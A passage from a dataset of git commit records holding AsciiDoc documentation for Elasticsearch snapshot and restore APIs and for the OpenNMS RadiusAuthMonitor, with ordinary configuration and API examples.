index settings can be overridden during the restore process. For example, the following command will restore\nthe index `index_1` without creating any replicas while switching back to default refresh interval:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1\",\n \"index_settings\": {\n \"index.number_of_replicas\": 0\n },\n \"ignore_index_settings\": [\n \"index.refresh_interval\"\n ]\n}\n-----------------------------------\n\/\/ CONSOLE\n\nPlease note, that some settings such as `index.number_of_shards` cannot be changed during restore operation.\n\n[float]\n==== Restoring to a different cluster\n\nThe information stored in a snapshot is not tied to a particular cluster or a cluster name. Therefore it's possible to\nrestore a snapshot made from one cluster into another cluster. All that is required is registering the repository\ncontaining the snapshot in the new cluster and starting the restore process. The new cluster doesn't have to have the\nsame size or topology. However, the version of the new cluster should be the same or newer (only 1 major version newer) than the cluster that was used to create the snapshot. For example, you can restore a 1.x snapshot to a 2.x cluster, but not a 1.x snapshot to a 5.x cluster.\n\nIf the new cluster has a smaller size additional considerations should be made. First of all it's necessary to make sure\nthat new cluster have enough capacity to store all indices in the snapshot. It's possible to change indices settings\nduring restore to reduce the number of replicas, which can help with restoring snapshots into smaller cluster. It's also\npossible to select only subset of the indices using the `indices` parameter. Prior to version 1.5.0 elasticsearch\ndidn't check restored persistent settings making it possible to accidentally restore an incompatible\n`discovery.zen.minimum_master_nodes` setting, and as a result disable a smaller cluster until the required number of\nmaster eligible nodes is added. Starting with version 1.5.0 incompatible settings are ignored.\n\nIf indices in the original cluster were assigned to particular nodes using\n<<shard-allocation-filtering,shard allocation filtering>>, the same rules will be enforced in the new cluster. Therefore\nif the new cluster doesn't contain nodes with appropriate attributes that a restored index can be allocated on, such\nindex will not be successfully restored unless these index allocation settings are changed during restore operation.\n\n[float]\n=== Snapshot status\n\nA list of currently running snapshots with their detailed status information can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nIn this format, the command will return information about all currently running snapshots. By specifying a repository name, it's possible\nto limit the results to a particular repository:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nIf both repository name and snapshot id are specified, this command will return detailed status information for the given snapshot even\nif it's not currently running:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nMultiple ids are also supported:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1,snapshot_2\/_status\n-----------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Monitoring snapshot\/restore progress\n\nThere are several ways to monitor the progress of the snapshot and restores processes while they are running. Both\noperations support `wait_for_completion` parameter that would block client until the operation is completed. This is\nthe simplest method that can be used to get notified about operation completion.\n\nThe snapshot operation can be also monitored by periodic calls to the snapshot info:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nPlease note that snapshot info operation uses the same resources and thread pool as the snapshot operation. So,\nexecuting a snapshot info operation while large shards are being snapshotted can cause the snapshot info operation to wait\nfor available resources before returning the result. On very large shards the wait time can be significant.\n\nTo get more immediate and complete information about snapshots the snapshot status command can be used instead:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nWhile snapshot info method returns only basic information about the snapshot in progress, the snapshot status returns\ncomplete breakdown of the current state for each shard participating in the snapshot.\n\nThe restore process piggybacks on the standard recovery mechanism of the Elasticsearch. As a result, standard recovery\nmonitoring services can be used to monitor the state of restore. When restore operation is executed the cluster\ntypically goes into `red` state. It happens because the restore operation starts with \"recovering\" primary shards of the\nrestored indices. During this operation the primary shards become unavailable which manifests itself in the `red` cluster\nstate. Once recovery of primary shards is completed Elasticsearch is switching to standard replication process that\ncreates the required number of replicas at this moment cluster switches to the `yellow` state. Once all required replicas\nare created, the cluster switches to the `green` states.\n\nThe cluster health operation provides only a high level status of the restore process. It\u2019s possible to get more\ndetailed insight into the current state of the recovery process by using <<indices-recovery, indices recovery>> and\n<<cat-recovery, cat recovery>> APIs.\n\n[float]\n=== Stopping currently running snapshot and restore operations\n\nThe snapshot and restore framework allows running only one snapshot or one restore operation at a time. If a currently\nrunning snapshot was executed by mistake, or takes unusually long, it can be terminated using the snapshot delete operation.\nThe snapshot delete operation checks if the deleted snapshot is currently running and if it does, the delete operation stops\nthat snapshot before deleting the snapshot data from the repository.\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nThe restore operation uses the standard shard recovery mechanism. Therefore, any currently running restore operation can\nbe canceled by deleting indices that are being restored. Please note that data for all deleted indices will be removed\nfrom the cluster as a result of this operation.\n\n[float]\n=== Effect of cluster blocks on snapshot and restore operations\nMany snapshot and restore operations are affected by cluster and index blocks. For example, registering and unregistering\nrepositories require write global metadata access. The snapshot operation requires that all indices and their metadata as\nwell as the global metadata were readable. The restore operation requires the global metadata to be writable, however\nthe index level blocks are ignored during restore because indices are essentially recreated during restore.\nPlease note that a repository content is not part of the cluster and therefore cluster blocks don't affect internal\nrepository operations such as listing or deleting snapshots from an already registered repository.\n","old_contents":"[[modules-snapshots]]\n== Snapshot And Restore\n\nThe snapshot and restore module allows to create snapshots of individual\nindices or an entire cluster into a remote repository like shared file system,\nS3, or HDFS. These snapshots are great for backups because they can be restored\nrelatively quickly but they are not archival because they can only be restored\nto versions of Elasticsearch that can read the index. That means that:\n\n* A snapshot of an index created in 2.x can be restored to 5.x.\n* A snapshot of an index created in 1.x can be restored to 2.x.\n* A snapshot of an index created in 1.x can **not** be restored to 5.x.\n\nTo restore a snapshot of an index created in 1.x to 5.x you can restore it to\na 2.x cluster and use <<reindex-from-remote,reindex-from-remote>> to rebuild\nthe index in a 5.x cluster. This is as time consuming as restoring from\narchival copies of the original data.\n\n[float]\n=== Repositories\n\nBefore any snapshot or restore operation can be performed, a snapshot repository should be registered in\nElasticsearch. The repository settings are repository-type specific. See below for details.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n ... repository specific settings ...\n }\n}\n-----------------------------------\n\nOnce a repository is registered, its information can be obtained using the following command:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nwhich returns:\n\n[source,js]\n-----------------------------------\n{\n \"my_backup\": {\n \"type\": \"fs\",\n \"settings\": {\n \"compress\": true,\n \"location\": \"\/mount\/backups\/my_backup\"\n }\n }\n}\n-----------------------------------\n\nInformation about multiple repositories can be fetched in one go by using a comma-delimited list of repository names.\nStar wildcards are supported as well. For example, information about repositories that start with `repo` or that contain `backup`\ncan be obtained using the following command:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/repo*,*backup*\n-----------------------------------\n\nIf a repository name is not specified, or `_all` is used as repository name Elasticsearch will return information about\nall repositories currently registered in the cluster:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\n-----------------------------------\n\nor\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/_all\n-----------------------------------\n\n[float]\n===== Shared File System Repository\n\nThe shared file system repository (`\"type\": \"fs\"`) uses the shared file system to store snapshots. In order to register\nthe shared file system repository it is necessary to mount the same shared filesystem to the same location on all\nmaster and data nodes. This location (or one of its parent directories) must be registered in the `path.repo`\nsetting on all master and data nodes.\n\nAssuming that the shared filesystem is mounted to `\/mount\/backups\/my_backup`, the following setting should be added to\n`elasticsearch.yml` file:\n\n[source,yaml]\n--------------\npath.repo: [\"\/mount\/backups\", \"\/mount\/longterm_backups\"]\n--------------\n\nThe `path.repo` setting supports Microsoft Windows UNC paths as long as at least server name and share are specified as\na prefix and back slashes are properly escaped:\n\n[source,yaml]\n--------------\npath.repo: [\"\\\\\\\\MY_SERVER\\\\Snapshots\"]\n--------------\n\nAfter all nodes are restarted, the following command can be used to register the shared file system repository with\nthe name `my_backup`:\n\n[source,js]\n-----------------------------------\n$ curl -XPUT 'http:\/\/localhost:9200\/_snapshot\/my_backup' -d '{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"\/mount\/backups\/my_backup\",\n \"compress\": true\n }\n}'\n-----------------------------------\n\nIf the repository location is specified as a relative path this path will be resolved against the first path specified\nin `path.repo`:\n\n[source,js]\n-----------------------------------\n$ curl -XPUT 'http:\/\/localhost:9200\/_snapshot\/my_backup' -d '{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup\",\n \"compress\": true\n }\n}'\n-----------------------------------\n\nThe following settings are supported:\n\n[horizontal]\n`location`:: Location of the snapshots. Mandatory.\n`compress`:: Turns on compression of the snapshot files. Compression is applied only to metadata files (index mapping and settings). Data files are not compressed. Defaults to `true`.\n`chunk_size`:: Big files can be broken down into chunks during snapshotting if needed. The chunk size can be specified in bytes or by\n using size value notation, i.e. 1g, 10m, 5k. Defaults to `null` (unlimited chunk size).\n`max_restore_bytes_per_sec`:: Throttles per node restore rate. Defaults to `40mb` per second.\n`max_snapshot_bytes_per_sec`:: Throttles per node snapshot rate. Defaults to `40mb` per second.\n`readonly`:: Makes repository read-only. Defaults to `false`.\n\n[float]\n===== Read-only URL Repository\n\nThe URL repository (`\"type\": \"url\"`) can be used as an alternative read-only way to access data created by the shared file\nsystem repository. The URL specified in the `url` parameter should point to the root of the shared filesystem repository.\nThe following settings are supported:\n\n[horizontal]\n`url`:: Location of the snapshots. Mandatory.\n\nURL Repository supports the following protocols: \"http\", \"https\", \"ftp\", \"file\" and \"jar\". URL repositories with `http:`,\n`https:`, and `ftp:` URLs has to be whitelisted by specifying allowed URLs in the `repositories.url.allowed_urls` setting.\nThis setting supports wildcards in the place of host, path, query, and fragment. For example:\n\n[source,yaml]\n-----------------------------------\nrepositories.url.allowed_urls: [\"http:\/\/www.example.org\/root\/*\", \"https:\/\/*.mydomain.com\/*?*#*\"]\n-----------------------------------\n\nURL repositories with `file:` URLs can only point to locations registered in the `path.repo` setting similar to\nshared file system repository.\n\n[float]\n===== Repository plugins\n\nOther repository backends are available in these official plugins:\n\n* {plugins}\/repository-s3.html[repository-s3] for S3 repository support\n* {plugins}\/repository-hdfs.html[repository-hdfs] for HDFS repository support in Hadoop environments\n* {plugins}\/repository-azure.html[repository-azure] for Azure storage repositories\n* {plugins}\/repository-gcs.html[repository-gcs] for Google Cloud Storage repositories\n\n[float]\n===== Repository Verification\nWhen a repository is registered, it's immediately verified on all master and data nodes to make sure that it is functional\non all nodes currently present in the cluster. The `verify` parameter can be used to explicitly disable the repository\nverification when registering or updating a repository:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/s3_repository?verify=false\n{\n \"type\": \"s3\",\n \"settings\": {\n \"bucket\": \"my_s3_bucket\",\n \"region\": \"eu-west-1\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe verification process can also be executed manually by running the following command:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/s3_repository\/_verify\n-----------------------------------\n\/\/ CONSOLE\n\nIt returns a list of nodes where repository was successfully verified or an error message if verification process failed.\n\n[float]\n=== Snapshot\n\nA repository can contain multiple snapshots of the same cluster. Snapshots are identified by unique names within the\ncluster. A snapshot with the name `snapshot_1` in the repository `my_backup` can be created by executing the following\ncommand:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1?wait_for_completion=true\n-----------------------------------\n\/\/ CONSOLE\n\nThe `wait_for_completion` parameter specifies whether or not the request should return immediately after snapshot\ninitialization (default) or wait for snapshot completion. During snapshot initialization, information about all\nprevious snapshots is loaded into the memory, which means that in large repositories it may take several seconds (or\neven minutes) for this command to return even if the `wait_for_completion` parameter is set to `false`.\n\nBy default a snapshot of all open and started indices in the cluster is created. This behavior can be changed by\nspecifying the list of indices in the body of the snapshot request.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": false\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe list of indices that should be included into the snapshot can be specified using the `indices` parameter that\nsupports <<search-multi-index-type,multi index syntax>>. The snapshot request also supports the\n`ignore_unavailable` option. Setting it to `true` will cause indices that do not exist to be ignored during snapshot\ncreation. By default, when `ignore_unavailable` option is not set and an index is missing the snapshot request will fail.\nBy setting `include_global_state` to false it's possible to prevent the cluster global state to be stored as part of\nthe snapshot. By default, the entire snapshot will fail if one or more indices participating in the snapshot don't have\nall primary shards available. This behaviour can be changed by setting `partial` to `true`.\n\nThe index snapshot process is incremental. In the process of making the index snapshot Elasticsearch analyses\nthe list of the index files that are already stored in the repository and copies only files that were created or\nchanged since the last snapshot. That allows multiple snapshots to be preserved in the repository in a compact form.\nSnapshotting process is executed in non-blocking fashion. All indexing and searching operation can continue to be\nexecuted against the index that is being snapshotted. However, a snapshot represents the point-in-time view of the index\nat the moment when snapshot was created, so no records that were added to the index after the snapshot process was started\nwill be present in the snapshot. The snapshot process starts immediately for the primary shards that has been started\nand are not relocating at the moment. Before version 1.2.0, the snapshot operation fails if the cluster has any relocating or\ninitializing primaries of indices participating in the snapshot. Starting with version 1.2.0, Elasticsearch waits for\nrelocation or initialization of shards to complete before snapshotting them.\n\nBesides creating a copy of each index the snapshot process can also store global cluster metadata, which includes persistent\ncluster settings and templates. The transient settings and registered snapshot repositories are not stored as part of\nthe snapshot.\n\nOnly one snapshot process can be executed in the cluster at any time. While snapshot of a particular shard is being\ncreated this shard cannot be moved to another node, which can interfere with rebalancing process and allocation\nfiltering. Elasticsearch will only be able to move a shard to another node (according to the current allocation\nfiltering settings and rebalancing algorithm) once the snapshot is finished.\n\nOnce a snapshot is created information about this snapshot can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nSimilar as for repositories, information about multiple snapshots can be queried in one go, supporting wildcards as well:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_*,some_other_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\nAll snapshots currently stored in the repository can be listed using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_all\n-----------------------------------\n\/\/ CONSOLE\n\nThe command fails if some of the snapshots are unavailable. The boolean parameter `ignore_unavailable` can be used to\nreturn all snapshots that are currently available.\n\nA currently running snapshot can be retrieved using the following command:\n\n[source,sh]\n-----------------------------------\n$ curl -XGET \"localhost:9200\/_snapshot\/my_backup\/_current\"\n-----------------------------------\n\nA snapshot can be deleted from the repository using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nWhen a snapshot is deleted from a repository, Elasticsearch deletes all files that are associated with the deleted\nsnapshot and not used by any other snapshots. If the deleted snapshot operation is executed while the snapshot is being\ncreated the snapshotting process will be aborted and all files created as part of the snapshotting process will be\ncleaned. Therefore, the delete snapshot operation can be used to cancel long running snapshot operations that were\nstarted by mistake.\n\nA repository can be deleted using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nWhen a repository is deleted, Elasticsearch only removes the reference to the location where the repository is storing\nthe snapshots. The snapshots themselves are left untouched and in place.\n\n[float]\n=== Restore\n\nA snapshot can be restored using the following command:\n\n[source,sh]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n-----------------------------------\n\/\/ CONSOLE\n\nBy default, all indices in the snapshot are restored, and the cluster state is\n*not* restored. It's possible to select indices that should be restored as well\nas to allow the global cluster state from being restored by using `indices` and\n`include_global_state` options in the restore request body. The list of indices\nsupports <<search-multi-index-type,multi index syntax>>. The `rename_pattern`\nand `rename_replacement` options can be also used to rename indices on restore\nusing regular expression that supports referencing the original text as\nexplained\nhttp:\/\/docs.oracle.com\/javase\/6\/docs\/api\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[here].\nSet `include_aliases` to `false` to prevent aliases from being restored together\nwith associated indices\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": true,\n \"rename_pattern\": \"index_(.+)\",\n \"rename_replacement\": \"restored_index_$1\"\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe restore operation can be performed on a functioning cluster. However, an\nexisting index can be only restored if it's <<indices-open-close,closed>> and\nhas the same number of shards as the index in the snapshot. The restore\noperation automatically opens restored indices if they were closed and creates\nnew indices if they didn't exist in the cluster. If cluster state is restored\nwith `include_cluster_state` (defaults to `false`), the restored templates that\ndon't currently exist in the cluster are added and existing templates with the\nsame name are replaced by the restored templates. The restored persistent\nsettings are added to the existing persistent settings.\n\n[float]\n==== Partial restore\n\nBy default, the entire restore operation will fail if one or more indices participating in the operation don't have\nsnapshots of all shards available. It can occur if some shards failed to snapshot for example. It is still possible to\nrestore such indices by setting `partial` to `true`. Please note, that only successfully snapshotted shards will be\nrestored in this case and all missing shards will be recreated empty.\n\n\n[float]\n==== Changing index settings during restore\n\nMost of index settings can be overridden during the restore process. For example, the following command will restore\nthe index `index_1` without creating any replicas while switching back to default refresh interval:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1\",\n \"index_settings\": {\n \"index.number_of_replicas\": 0\n },\n \"ignore_index_settings\": [\n \"index.refresh_interval\"\n ]\n}\n-----------------------------------\n\/\/ CONSOLE\n\nPlease note, that some settings such as `index.number_of_shards` cannot be changed during restore operation.\n\n[float]\n==== Restoring to a different cluster\n\nThe information stored in a snapshot is not tied to a particular cluster or a cluster name. Therefore it's possible to\nrestore a snapshot made from one cluster into another cluster. All that is required is registering the repository\ncontaining the snapshot in the new cluster and starting the restore process. The new cluster doesn't have to have the\nsame size or topology. However, the version of the new cluster should be the same or newer (only 1 major version newer) than the cluster that was used to create the snapshot. For example, you can restore a 1.x snapshot to a 2.x cluster, but not a 1.x snapshot to a 5.x cluster.\n\nIf the new cluster has a smaller size additional considerations should be made. First of all it's necessary to make sure\nthat new cluster have enough capacity to store all indices in the snapshot. It's possible to change indices settings\nduring restore to reduce the number of replicas, which can help with restoring snapshots into smaller cluster. It's also\npossible to select only subset of the indices using the `indices` parameter. Prior to version 1.5.0 elasticsearch\ndidn't check restored persistent settings making it possible to accidentally restore an incompatible\n`discovery.zen.minimum_master_nodes` setting, and as a result disable a smaller cluster until the required number of\nmaster eligible nodes is added. Starting with version 1.5.0 incompatible settings are ignored.\n\nIf indices in the original cluster were assigned to particular nodes using\n<<shard-allocation-filtering,shard allocation filtering>>, the same rules will be enforced in the new cluster. Therefore\nif the new cluster doesn't contain nodes with appropriate attributes that a restored index can be allocated on, such\nindex will not be successfully restored unless these index allocation settings are changed during restore operation.\n\n[float]\n=== Snapshot status\n\nA list of currently running snapshots with their detailed status information can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nIn this format, the command will return information about all currently running snapshots. By specifying a repository name, it's possible\nto limit the results to a particular repository:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nIf both repository name and snapshot id are specified, this command will return detailed status information for the given snapshot even\nif it's not currently running:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nMultiple ids are also supported:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1,snapshot_2\/_status\n-----------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Monitoring snapshot\/restore progress\n\nThere are several ways to monitor the progress of the snapshot and restores processes while they are running. Both\noperations support `wait_for_completion` parameter that would block client until the operation is completed. This is\nthe simplest method that can be used to get notified about operation completion.\n\nThe snapshot operation can be also monitored by periodic calls to the snapshot info:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nPlease note that snapshot info operation uses the same resources and thread pool as the snapshot operation. So,\nexecuting a snapshot info operation while large shards are being snapshotted can cause the snapshot info operation to wait\nfor available resources before returning the result. On very large shards the wait time can be significant.\n\nTo get more immediate and complete information about snapshots the snapshot status command can be used instead:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nWhile snapshot info method returns only basic information about the snapshot in progress, the snapshot status returns\ncomplete breakdown of the current state for each shard participating in the snapshot.\n\nThe restore process piggybacks on the standard recovery mechanism of the Elasticsearch. As a result, standard recovery\nmonitoring services can be used to monitor the state of restore. When restore operation is executed the cluster\ntypically goes into `red` state. It happens because the restore operation starts with \"recovering\" primary shards of the\nrestored indices. During this operation the primary shards become unavailable which manifests itself in the `red` cluster\nstate. Once recovery of primary shards is completed Elasticsearch is switching to standard replication process that\ncreates the required number of replicas at this moment cluster switches to the `yellow` state. Once all required replicas\nare created, the cluster switches to the `green` states.\n\nThe cluster health operation provides only a high level status of the restore process. It\u2019s possible to get more\ndetailed insight into the current state of the recovery process by using <<indices-recovery, indices recovery>> and\n<<cat-recovery, cat recovery>> APIs.\n\n[float]\n=== Stopping currently running snapshot and restore operations\n\nThe snapshot and restore framework allows running only one snapshot or one restore operation at a time. If a currently\nrunning snapshot was executed by mistake, or takes unusually long, it can be terminated using the snapshot delete operation.\nThe snapshot delete operation checks if the deleted snapshot is currently running and if it does, the delete operation stops\nthat snapshot before deleting the snapshot data from the repository.\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nThe restore operation uses the standard shard recovery mechanism. Therefore, any currently running restore operation can\nbe canceled by deleting indices that are being restored. Please note that data for all deleted indices will be removed\nfrom the cluster as a result of this operation.\n\n[float]\n=== Effect of cluster blocks on snapshot and restore operations\nMany snapshot and restore operations are affected by cluster and index blocks. For example, registering and unregistering\nrepositories require write global metadata access. The snapshot operation requires that all indices and their metadata as\nwell as the global metadata were readable. The restore operation requires the global metadata to be writable, however\nthe index level blocks are ignored during restore because indices are essentially recreated during restore.\nPlease note that a repository content is not part of the cluster and therefore cluster blocks don't affect internal\nrepository operations such as listing or deleting snapshots from an already registered repository.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"95d0e3954874d4fdd3cb6818a0c7ed261dbb115f","subject":"NMS-6700: Documentation RadiusAuthMonitor","message":"NMS-6700: Documentation RadiusAuthMonitor\n\n- improve summary\n- Fix toc depth\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/RadiusAuthMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/RadiusAuthMonitor.adoc","new_contents":"\n==== RadiusAuthMonitor\n\nThis monitor allows to test the functionality of the link:http:\/\/freeradius.org\/rfc\/rfc2865.html[RADIUS] authentication system.\nThe availability is tested by sending an _AUTH_ packet to the _RADIUS server_.\nIf a valid _ACCEPT_ response is received, the _RADIUS_ service is _up_ and considered as available.\n\nIMPORTANT: To use this monitor it is required to install the _RADIUS_ protocol for OpenNMS.\n\n[source, bash]\n----\n{apt-get,yum} install opennms-plugin-protocol-radius\n----\n\nThe test is similar to test the behavior of a _RADIUS_ server by evaluating the result with the command line tool `radtest`.\n\n[source, bash]\n----\nroot@vagrant:~# radtest \"John Doe\" hello 127.0.0.1 1812 radiuspassword\nSending Access-Request of id 49 to 127.0.0.1 port 1812\n\tUser-Name = \"John Doe\"\n\tUser-Password = \"hello\"\n\tNAS-IP-Address = 127.0.0.1\n\tNAS-Port = 1812\n\tMessage-Authenticator = 0x00000000000000000000000000000000\nrad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=49, length=37 <1>\n\tReply-Message = \"Hello, John Doe\"\n----\n<1> The `Access-Accept` message which is evaluated by the monitor.\n\n===== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.protocols.radius.monitor.RadiusAuthMonitor`\n| Remote Enabled | false\n|===\n\n===== Configuration and Usage\n\n.Monitor specific parameters for the RadiusAuthMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `timeout` | Time in milliseconds to wait for the _RADIUS_ service. | optional | `5000`\n| `retry` | This is a placeholder for the second optional monitor parameter description. | optional | `0`\n| `authport` | _RADIUS_ authentication port. | optional | `1812`\n| `acctport` | _RADIUS_ accounting port. | optional | `1813`\n| `user` | Username to test the authentication | optional | `OpenNMS`\n| `password` | Password to test the authentication | optional | `OpenNMS`\n| `secret` | The _RADIUS_ shared secret used for communication between the _client\/NAS_\n and the _RADIUS_ server. | optional | `secret`\n| `authtype` | _RADIUS_ authentication type. The following authentication types are supported:\n `chap`, `pap`, `mschapv1`, `mschapv2`, `eapmd5`, `eapmschapv2` | optional | `pap`\n| `nasid` | The link:http:\/\/freeradius.org\/rfc\/rfc2865.html#NAS-Identifier[Network Access Server identifier]\n originating the _Access-Request_. | optional | `opennms`\n|===\n\n===== Examples\nExample configuration how to configure the monitor in the `poller-configuration.xml`.\n\n[source, xml]\n----\n<service name=\"Radius-Authentication\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"3\" \/>\n <parameter key=\"timeout\" value=\"3000\" \/>\n <parameter key=\"user\" value=\"John Doe\" \/>\n <parameter key=\"password\" value=\"hello\" \/>\n <parameter key=\"secret\" value=\"radiuspassword\" \/>\n <parameter key=\"rrd-repository\" value=\"\/var\/lib\/opennms\/rrd\/response\" \/>\n <parameter key=\"ds-name\" value=\"radiusauth\" \/>\n<\/service>\n\n<monitor service=\"Radius-Authentication\" class-name=\"org.opennms.protocols.radius.monitor.RadiusAuthMonitor\" \/>\n----\n","old_contents":"\n=== RadiusAuthMonitor\n\nThis monitor allows to test the functionality of the link:http:\/\/freeradius.org\/rfc\/rfc2865.html[RADIUS] service.\nThe availability is tested by sending an _AUTH_ packet to the host.\nIf a valid _ACCEPT_ response is received, then the _RADIUS_ service is _up_ and considered as available.\n\nIMPORTANT: To use this monitor it is required to install the _RADIUS_ protocol for OpenNMS.\n\n----\n{apt-get,yum} install opennms-plugin-protocol-radius\n----\n\nThe test is similar to test the behavior of a _RADIUS_ server by evaluating the result with the command line tool `radtest`.\n\n[source, bash]\n----\nroot@vagrant:~# radtest \"John Doe\" hello 127.0.0.1 1812 radiuspassword\nSending Access-Request of id 49 to 127.0.0.1 port 1812\n\tUser-Name = \"John Doe\"\n\tUser-Password = \"hello\"\n\tNAS-IP-Address = 127.0.0.1\n\tNAS-Port = 1812\n\tMessage-Authenticator = 0x00000000000000000000000000000000\nrad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=49, length=37 <1>\n\tReply-Message = \"Hello, John Doe\"\n----\n<1> The `Access-Accept` message which is evaluated by the monitor.\n\n==== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.protocols.radius.monitor.RadiusAuthMonitor`\n| Remote Enabled | false\n|===\n\n==== Configuration and Usage\n\n.Monitor specific parameters for the RadiusAuthMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `timeout` | Time in milliseconds to wait for the _RADIUS_ service. | optional | `5000`\n| `retry` | This is a placeholder for the second optional monitor parameter description. | optional | `0`\n| `authport` | _RADIUS_ authentication port. | optional | `1812`\n| `acctport` | _RADIUS_ accounting port. | optional | `1813`\n| `user` | Username to test the authentication | optional | `OpenNMS`\n| `password` | Password to test the authentication | optional | `OpenNMS`\n| `secret` | The _RADIUS_ shared secret used for communication between the _client\/NAS_\n and the _RADIUS_ server. | optional | `secret`\n| `authtype` | _RADIUS_ authentication type. The following authentication types are supported:\n `chap`, `pap`, `mschapv1`, `mschapv2`, `eapmd5`, `eapmschapv2` | optional | `pap`\n| `nasid` | The link:http:\/\/freeradius.org\/rfc\/rfc2865.html#NAS-Identifier[Network Access Server identifier]\n originating the _Access-Request_. | optional | `opennms`\n|===\n\n==== Examples\nExample configuration how to configure the monitor in the 'poller-configuration.xml'.\n\n[source, xml]\n----\n<service name=\"Radius-Authentication\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"3\" \/>\n <parameter key=\"timeout\" value=\"3000\" \/>\n <parameter key=\"user\" value=\"John Doe\" \/>\n <parameter key=\"password\" value=\"hello\" \/>\n <parameter key=\"secret\" value=\"radiuspassword\" \/>\n <parameter key=\"rrd-repository\" value=\"\/var\/lib\/opennms\/rrd\/response\" \/>\n <parameter key=\"ds-name\" value=\"radiusauth\" \/>\n<\/service>\n\n<monitor service=\"Radius-Authentication\" class-name=\"org.opennms.protocols.radius.monitor.RadiusAuthMonitor\" \/>\n----\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ddc3eaed68e9c5505676f145c9693009e2529adb","subject":"changed an instance of MIB to OID in bridge-discovery.adoc","message":"changed an instance of MIB to OID in 